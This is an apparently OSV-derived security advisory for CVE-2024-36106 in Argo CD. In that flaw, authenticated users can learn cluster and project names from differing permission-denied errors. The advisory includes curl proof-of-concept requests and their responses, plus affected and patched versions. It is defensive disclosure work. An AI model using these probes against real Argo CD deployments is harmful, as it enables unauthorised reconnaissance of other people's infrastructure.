---
id: CVE-2024-36106
aliases:
  - GHSA-3cqf-953p-h5cp
  - BIT-argo-cd-2024-36106
  - GO-2024-2898
title: Argo-cd authenticated users can enumerate clusters by name
summary: Argo-cd authenticated users can enumerate clusters by name
severity: medium
cvss: 4.3
cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'
vendor: argoproj
product: github.com/argoproj/argo-cd
ecosystem: go
affected:
  - 'github.com/argoproj/argo-cd >= 0.11.0, < 2.9.17'
  - 'github.com/argoproj/argo-cd >= 2.10.0, < 2.10.12'
  - 'github.com/argoproj/argo-cd >= 2.11.0, < 2.11.3'
patched:
  - github.com/argoproj/argo-cd 2.9.17
  - github.com/argoproj/argo-cd 2.10.12
  - github.com/argoproj/argo-cd 2.11.3
published: '2024-06-06'
updated: '2026-09-10'
sourceUpdated: '2026-09-10T03:50:14.788016350Z'
source: OSV
sourceUrl: 'https://osv.dev/vulnerability/GHSA-3cqf-953p-h5cp'
references:
  - url: >-
      https://github.com/argoproj/argo-cd/security/advisories/GHSA-3cqf-953p-h5cp
  - url: 'https://nvd.nist.gov/vuln/detail/CVE-2024-36106'
  - url: >-
      https://github.com/argoproj/argo-cd/commit/c2647055c261a550e5da075793260f6524e65ad9
  - url: 'https://github.com/argoproj/argo-cd'
tags:
  - osv
  - go
epss: 0.00408
epssPercentile: 0.3231
ingestedAt: '2026-09-12T03:13:01.748Z'
---

## Overview

### Impact
It’s possible for authenticated users to enumerate clusters by name by inspecting error messages:

```
$ curl -k 'https://localhost:8080/api/v1/clusters/in-cluster?id.type=name' -H "Authorization: 
Bearer $token"
{"error":"permission denied: clusters, get, , sub: alice, iat: 2022-11-04T20:25:44Z","code":7,"message":"permission denied: clusters, get, , sub: alice, iat: 2022-11-04T20:25:44Z"}⏎                                 
                                   
$ curl -k 'https://localhost:8080/api/v1/clusters/does-not-exist?id.type=name' -H "Authorizati
on: Bearer $token"
{"error":"permission denied","code":7,"message":"permission denied"}
```

It’s also possible to enumerate the names of projects with project-scoped clusters if you know the names of the clusters.
```
curl -k 'https://localhost:8080/api/v1/clusters/in-cluster-project?id.type=name' -H "Authorization: Bearer $token"
{"error":"permission denied: clusters, get, default/, sub: alice, iat: 2022-11-04T20:25:44Z","code":7,"message":"permission denied: clusters, get, default/, sub: alice, iat: 2022-11-04T20:25:44Z"}

curl -k 'https://localhost:8080/api/v1/clusters/does-not-exist?id.type=name' -H "Authorization: Bearer $token"
{"error":"permission denied","code":7,"message":"permission denied"}
```

### Patches
A patch for this vulnerability has been released in the following Argo CD versions:

v2.11.3
v2.10.12
v2.9.17

### For more information
If you have any questions or comments about this advisory:

Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)
Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd

Credits
This vulnerability was found & reported by @crenshaw-dev (Michael Crenshaw)

The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue


## Affected packages

- `github.com/argoproj/argo-cd >= 0.11.0, < 2.9.17`
- `github.com/argoproj/argo-cd >= 2.10.0, < 2.10.12`
- `github.com/argoproj/argo-cd >= 2.11.0, < 2.11.3`

## Remediation

Upgrade to a patched release:

- `github.com/argoproj/argo-cd 2.9.17`
- `github.com/argoproj/argo-cd 2.10.12`
- `github.com/argoproj/argo-cd 2.11.3`
